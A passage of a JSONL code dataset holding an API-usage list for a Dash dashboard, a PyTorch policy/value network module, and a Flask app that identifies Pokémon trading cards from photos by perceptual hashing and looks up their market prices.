"dash_bootstrap_components.Col", "line_number": 310, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 311, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 315, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 315, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 317, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 317, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 318, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 318, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 319, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 319, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 320, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 320, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 321, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 321, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 322, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 322, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 323, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 323, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 326, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 326, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 327, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 328, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 328, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 329, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 330, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 331, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 331, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 335, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 335, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 337, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 337, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 338, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 338, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 339, "usage_type": "call"}, {"api_name": "dash.html.H6", "line_number": 340, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 340, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 341, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 341, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 342, "usage_type": "call"}, {"api_name": "dash.html.Div", "line_number": 344, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 344, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 345, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 346, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 347, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 351, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 351, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 353, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 353, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 354, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 354, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 355, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 355, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 355, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 356, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 356, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 357, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 357, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 361, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 361, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 362, "usage_type": "call"}, {"api_name": "dash.html.H6", "line_number": 363, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 363, "usage_type": "name"}, {"api_name": "dash.html.H6", "line_number": 364, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 364, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 365, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 366, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 366, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 370, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 370, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 372, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 372, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 373, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 373, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 374, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 375, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 376, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 377, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 378, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 379, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 379, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 380, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 380, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 383, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 384, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 385, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 385, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 386, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 386, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 389, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 390, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 391, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 392, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 392, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 395, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 396, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 397, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 397, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 398, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 398, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 402, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 403, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 404, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 405, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 406, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 409, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 410, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 411, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 411, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 412, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 412, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 415, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 416, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 417, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 417, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 418, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 418, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Card", "line_number": 421, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 422, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 423, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 423, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 424, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.CardBody", "line_number": 424, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 432, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 432, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 434, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 434, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 435, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 435, "usage_type": "name"}, {"api_name": "dash.html.H5", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 436, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 436, "usage_type": "call"}, {"api_name": "dash.html.Br", "line_number": 437, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 437, "usage_type": "name"}, {"api_name": "dash.html.Span", "line_number": 438, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 438, "usage_type": "name"}, {"api_name": "dash.html.Div", "line_number": 443, "usage_type": "call"}, {"api_name": "dash.html", "line_number": 443, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Row", "line_number": 444, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 445, "usage_type": "call"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 446, "usage_type": "call"}, {"api_name": "dash.dcc.Graph", "line_number": 446, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 446, "usage_type": "name"}, {"api_name": "dash_bootstrap_components.Col", "line_number": 447, "usage_type": "call"}, {"api_name": "dash.dcc.Graph", "line_number": 447, "usage_type": "call"}, {"api_name": "dash.dcc", "line_number": 447, "usage_type": "name"}, {"api_name": "plotly.express.line", "line_number": 468, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 468, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 462, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 463, "usage_type": "call"}, {"api_name": "plotly.express.bar", "line_number": 492, "usage_type": "call"}, {"api_name": "plotly.express", "line_number": 492, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 486, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 487, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 511, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 512, "usage_type": "call"}, {"api_name": "plotly.graph_objects.Figure", "line_number": 528, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 528, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 529, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 529, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 533, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 533, "usage_type": "name"}, {"api_name": "plotly.graph_objects.Scatter", "line_number": 537, "usage_type": "call"}, {"api_name": "plotly.graph_objects", "line_number": 537, "usage_type": "name"}, {"api_name": "dash.Output", "line_number": 521, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 522, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 558, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 559, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 570, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 571, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 581, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 582, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 592, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 593, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 610, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 611, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 614, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 614, "usage_type": "attribute"}, {"api_name": "datetime.timedelta", "line_number": 615, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 603, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 604, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 623, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 624, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 634, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 635, "usage_type": "call"}, {"api_name": "dash.Output", "line_number": 645, "usage_type": "call"}, {"api_name": "dash.Input", "line_number": 646, "usage_type": "call"}]} +{"seq_id": "74429776166", "text": "\nimport numpy as np\nimport torch\nfrom torch import nn\n\nfrom torch.nn import functional as F\n\n\nclass Model(nn.Module):\n \"\"\"\n ## Model\n \"\"\"\n\n def __init__(self, state_size, action_size):\n super().__init__()\n\n self.fc1 = nn.Linear(in_features=state_size, out_features=256)\n nn.init.orthogonal_(self.fc1.weight, np.sqrt(0.01))\n self.fc2 = nn.Linear(in_features=256, out_features=256)\n nn.init.orthogonal_(self.fc2.weight, np.sqrt(0.01))\n self.fc3 = nn.Linear(in_features=256, out_features=256)\n nn.init.orthogonal_(self.fc3.weight, np.sqrt(0.01))\n\n # policy output\n self.pi_logits = nn.Linear(in_features=256, out_features=action_size)\n nn.init.orthogonal_(self.pi_logits.weight, np.sqrt(0.01))\n\n # value function output\n self.value = nn.Linear(in_features=256, out_features=1)\n nn.init.orthogonal_(self.value.weight, 1)\n\n def forward(self, obs):\n h: torch.Tensor\n\n h = F.relu(self.fc1(obs))\n h = F.relu(self.fc2(h))\n h = F.relu(self.fc3(h))\n\n value = self.value(h).reshape(-1)\n\n return self.pi_logits(h), value\n", "repo_name": "AndreHeunis5/game_optimise", "sub_path": "ppo/Model.py", "file_name": "Model.py", "file_ext": "py", "file_size_in_byte": 1156, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "torch.nn.Module", "line_number": 9, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Linear", "line_number": 17, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 17, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 18, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 18, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 21, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 22, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 25, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 25, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 26, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 26, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.nn.Linear", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.nn.init.orthogonal_", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.nn.init", "line_number": 30, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.Tensor", "line_number": 33, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.relu", "line_number": 35, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 35, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 36, "usage_type": "name"}, {"api_name": "torch.nn.functional.relu", "line_number": 37, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 37, "usage_type": "name"}]} +{"seq_id": "71811613929", "text": "from flask import Flask, render_template, current_app, request, redirect, url_for, jsonify\nimport urllib\nfrom urllib.request import Request, urlopen\nimport json\nimport imagehash\nfrom PIL import Image\nimport cv2\nimport numpy as np\nimport os\nimport requests\n\ndef flattener(image, pts, w, h):\n \"\"\"Flattens an image of a card into a top-down 200x300 perspective.\n Returns the flattened, re-sized, grayed image.\"\"\"\n temp_rect = np.zeros((4, 2), dtype=\"float32\")\n\n s = np.sum(pts, axis=2)\n\n tl = pts[np.argmin(s)]\n br = pts[np.argmax(s)]\n\n diff = np.diff(pts, axis=-1)\n tr = pts[np.argmin(diff)]\n bl = pts[np.argmax(diff)]\n\n # Need to create an array listing points in order of\n # [top left, top right, bottom right, bottom left]\n # before doing the perspective transform\n\n if w <= 0.8 * h: # If card is vertically oriented\n temp_rect[0] = tl\n temp_rect[1] = tr\n temp_rect[2] = br\n temp_rect[3] = bl\n\n if w >= 1.2 * h: # If card is horizontally oriented\n temp_rect[0] = bl\n temp_rect[1] = tl\n temp_rect[2] = tr\n temp_rect[3] = br\n\n # If the card is 'diamond' oriented, a different algorithm\n # has to be used to identify which point is top left, top right\n # bottom left, and bottom right.\n\n if w > 0.8 * h and w < 1.2 * h: # If card is diamond oriented\n # If furthest left point is higher than furthest right point,\n # card is tilted to the left.\n if pts[1][0][1] <= pts[3][0][1]:\n # If card is titled to the left, approxPolyDP returns points\n # in this order: top right, top left, bottom left, bottom right\n temp_rect[0] = pts[1][0] # Top left\n temp_rect[1] = pts[0][0] # Top right\n temp_rect[2] = pts[3][0] # Bottom right\n temp_rect[3] = pts[2][0] # Bottom left\n\n # If furthest left point is lower than furthest right point,\n # card is tilted to the right\n if pts[1][0][1] > pts[3][0][1]:\n # If card is titled to the right, approxPolyDP returns points\n # in this order: top left, bottom left, bottom right, top right\n temp_rect[0] = pts[0][0] # Top left\n temp_rect[1] = pts[3][0] # Top right\n temp_rect[2] = pts[2][0] # Bottom right\n temp_rect[3] = pts[1][0] # Bottom left\n\n maxWidth = 200\n maxHeight = 300\n\n # Create destination array, calculate perspective transform matrix,\n # and warp card image\n dst = np.array([[0, 0], [maxWidth - 1, 0], [maxWidth - 1, maxHeight - 1], [0, maxHeight - 1]], np.float32)\n M = cv2.getPerspectiveTransform(temp_rect, dst)\n warp = cv2.warpPerspective(image, M, (maxWidth, maxHeight))\n #this just transforms and flattens the card\n \n #warp = cv2.cvtColor(warp, cv2.COLOR_BGR2GRAY)\n return warp\n\n\ndef getcardPhoto(photo):\n\n img = cv2.imread(photo) #reads photo\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY) #grayscales the image \n img_w, img_h = np.shape(img)[:2] #gets height and width for image\n bkg_level = gray[int(img_h / 100)][int(img_w / 2)] #does some preprocessing to the image to deal with the background\n thresh_level = bkg_level + 60 #we get the threshold level for the image, threshold sets pixels below pixel value to 0. So this level makes sure we set the background to black, so its not picked up\n blurImg = cv2.GaussianBlur(gray, (5,5), 0) #applies some gaussian blur to the image to help fade out the background\n _, thresh = cv2.threshold(blurImg, thresh_level, 255, cv2.THRESH_BINARY) #returns a tupple, first return is threshold value which is not important and second is the thresholded image, the 255 is max values that the pixels can have after threshold\n #above is where the potential errors lie for this program, image preprocessing is hit or miss and needs a lot of trial and error \n \n contours, _ = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE) #gets the contours of the image\n\n contourValues = []\n for i in contours:\n contourValues.append(cv2.contourArea(i))\n contourValues.sort()\n #adds all contours in the image to an array of contours\n\n biggestContour = 0\n bigContourIndex = len(contourValues)-1\n\n for b in contours:\n if cv2.contourArea(b) == contourValues[-1]:\n biggestContour = b\n #This makes sure that the last contour of the array(the biggest one) is actually the contour around the card\n\n #once we have contours\n if len(contourValues) != 0:\n peri = cv2.arcLength(biggestContour, True) #defines a permiter around the card\n approx = cv2.approxPolyDP(biggestContour, 0.01 * peri, True) #helps identify the rectangle that is the card\n pts = np.float32(approx) #gets the 4 points for the rectangle\n CardCornerPoints = pts\n x, y, w, h = cv2.boundingRect(biggestContour) #highights the card and returns the x,y away from origin and width/height values for the card.\n CardWidth, CardHeight = w, h #assigning width and height\n average = np.sum(pts, axis=0)/len(pts) #finds center of the card based on the average of 4 corner points\n cent_x = int(average[0][0]) #assigns x value for center\n cent_y = int(average[0][1]) #assigns y value for center\n CardCenter = [cent_x, cent_y] #makes an array with the center\n img = flattener(img, pts, w, h) #sends image to be preprocessed farther and then flattened to 200x300 pixel image\n cv2.imwrite('camImage.png', img) #saves the newly processed image\n hashForCamImg = imagehash.phash(Image.open('camImage.png')) #gets the perceptual hash for the saved image\n return hashForCamImg\n #print(hashForCamImg)\n #hashForOnlineImg = imagehash.phash(Image.open('78.png'))\n #print(hashForOnlineImg)\n #print((hashForCamImg - hashForOnlineImg))\n\n\n #img = warpedIMG[0: 30, 0:int(w/2)]\n #print(pytesseract.image_to_string(img))\n #cv2.rectangle(img, (x, y), (x + w, y + h), (34, 65, 255), 3)\n #img = img[y:y+h, x:x+w]\n #cv2.imshow('image', img)\n\n\n else:\n return 'busted' #otherwise we dont detect any contours and we just return\n cv2.drawContours(img, contours, -1, (0,255,0), 3)\n\n #cv2.imshow('image', img)\n\n\n key = cv2.waitKey(0) #for testing locally\n cv2.destroyAllWindows() #for local testing \n\n\napp = Flask(__name__, static_url_path='') #declaring the flask application\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n program brakes if it caches because it will cache the previous post results and it wont update,\n this removes caching so that the program will run properly\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\n@app.route(\"/index.html\") #renders home page when logo clicked\ndef topLeft():\n return render_template(\"index.html\")\n\n@app.route(\"/\") #renders home page\ndef home():\n return render_template(\"index.html\")\n\n@app.route(\"/pokemon.html\") #renders pokemon page\ndef poke():\n return render_template(\"pokemon.html\")\n\n\n@app.route(\"/pokemon.html\", methods=['POST']) #user sends pokemon card image\ndef getIMG():\n userinputImage = request.files['user_group_logo'] #gets the image that the user inputted\n readyTorender = False\n buyCardURL =''\n if userinputImage.filename == '': #this is executed if no image is sent, should render a template that says no image was detected as input\n return render_template(\"pokemon.html\", message='no file was uploaded') #kind of like sending a prop in react \n if userinputImage.filename != '': #user inputted an actual image\n userinputImage.save('static/assets/img/inputImageName.png') #overwrites a default saved image\n print('<----got image---->') \n print(userinputImage.filename) #this was just for testing, to make sure it was saving properly\n photo = 'static/assets/img/inputImageName.png' #full path\n photoPath = 'assets/img/inputImageName.png'\n camHash = getcardPhoto(photo) # this is what to use when passing in a photo, this passes to a function that returns the perceptual hash for the pokemon card\n\n if type(camHash) == str: #this if statement is executed if the pokemon card is not picked up at all, and then no hash is sent back.\n print('try again')\n return render_template(\"pokemon.html\", message='unable to identify the pokemon card please try again') #this should render a template that says take a better picture\n\n #opens up json file with all hashes and pokemon info and instantiates some variables to use later\n with open('backupForpokeJSONUpToBW10.json') as f:\n newFileData = json.load(f)\n first = newFileData[0]\n likelyPoke = ''\n likelyId = ''\n listOfSmallestDifsNames = []\n listOfSmallestDifsImages = []\n smallestDiff = abs(camHash - imagehash.hex_to_hash(first['hash'])) #sets the initial smallest hash to the first pokemon\n for i in newFileData: #loops through entire file, checks for the smallest differences between hashes, and then adds them to the array. also gets pokemon name, id, and images\n if abs(camHash - imagehash.hex_to_hash(i['hash'])) < smallestDiff: #new info about closest match is added to the end of the array\n likelyPoke = i['name']\n likelyId = i['id']\n imageForlikelyPoke = i['images']\n imageForlikelyPoke = imageForlikelyPoke['small']\n smallestDiff = abs(camHash - imagehash.hex_to_hash(i['hash'])) #gets the value of the closest match by substracting the input image hash-the image hash of the current pokemon in the file\n listOfSmallestDifsNames.append(likelyPoke)\n listOfSmallestDifsImages.append(imageForlikelyPoke)\n\n print(f'name: {likelyPoke}, image: {imageForlikelyPoke}, id: {likelyId}') #prings the pokemon that were most similar to the input image\n try: #gets pokemon price data\n headers = {'X-Api-Key': 'apiKeyGoesHere'}\n urlWithId = 'https://api.pokemontcg.io/v2/cards/' + likelyId\n pokePriceresponse = requests.get(urlWithId, headers=headers)\n pokemonPriceData = pokePriceresponse.json()['data']['tcgplayer']\n buyCardURL = pokemonPriceData['url']\n ActualPrices = pokemonPriceData['prices']['normal']['market']\n ActualPrices= f'market price is : {ActualPrices}$'\n \n except:\n try:\n #incase of holofoil\n ActualPrices= pokemonPriceData['prices']['holofoil']['market']\n ActualPrices = f'holofoil price: {ActualPrices}$'\n\n except:\n try:\n #no price found\n ActualPrices = 'unfortunately we could not detect a price'\n\n except:\n #no data at all found\n ActualPrices = 'no data found on the card'\n\n\n\n probabilityCount = 1 #this was used when getting the most similar 5 pokemon cards, done locally but not implemented live on site\n listOfSmallestDifsNames = reversed(listOfSmallestDifsNames) #flips array to get most similar first\n listOfSmallestDifsImages = reversed(listOfSmallestDifsImages) #same thing but for images\n '''\n for probableCardName, probableCardImage in zip(listOfSmallestDifsNames, listOfSmallestDifsImages):\n print(f'choice number {probabilityCount} name : {probableCardName} ||'\n f' image : {probableCardImage}')\n probabilityCount += 1\n '''\n readyTorender = True\n return render_template(\"pokemon.html\", content=imageForlikelyPoke, content2=photoPath, readyTorender=readyTorender, pricing=ActualPrices, buyLink=buyCardURL) #updates all the information on the flask application\n\n@app.route(\"/yugioh.html\") #renders yugioh page\ndef yugioh():\n return render_template(\"yugioh.html\")\n\n@app.route(\"/magic.html\") #renders the MTG page\ndef magic():\n return render_template(\"magic.html\")\n\nif __name__ == \"__main__\": #required for running flask application\n app.run()\n", "repo_name": "luke-ichpekov/TradingCardPhoto-identifier-priceCheck", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 12481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.zeros", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.diff", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.argmin", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 72, "usage_type": "attribute"}, {"api_name": "cv2.getPerspectiveTransform", "line_number": 73, "usage_type": "call"}, {"api_name": "cv2.warpPerspective", "line_number": 74, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 83, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 84, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 84, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.GaussianBlur", "line_number": 88, "usage_type": "call"}, {"api_name": "cv2.threshold", "line_number": 89, "usage_type": "call"}, {"api_name": "cv2.THRESH_BINARY", "line_number": 89, "usage_type": "attribute"}, {"api_name": "cv2.findContours", "line_number": 92, "usage_type": "call"}, {"api_name": "cv2.RETR_LIST", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.CHAIN_APPROX_SIMPLE", "line_number": 92, "usage_type": "attribute"}, {"api_name": "cv2.contourArea", "line_number": 96, "usage_type": "call"}, {"api_name": "cv2.contourArea", "line_number": 104, "usage_type": "call"}, {"api_name": "cv2.arcLength", "line_number": 110, "usage_type": "call"}, {"api_name": "cv2.approxPolyDP", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 112, "usage_type": "call"}, {"api_name": "cv2.boundingRect", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 116, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 121, "usage_type": "call"}, 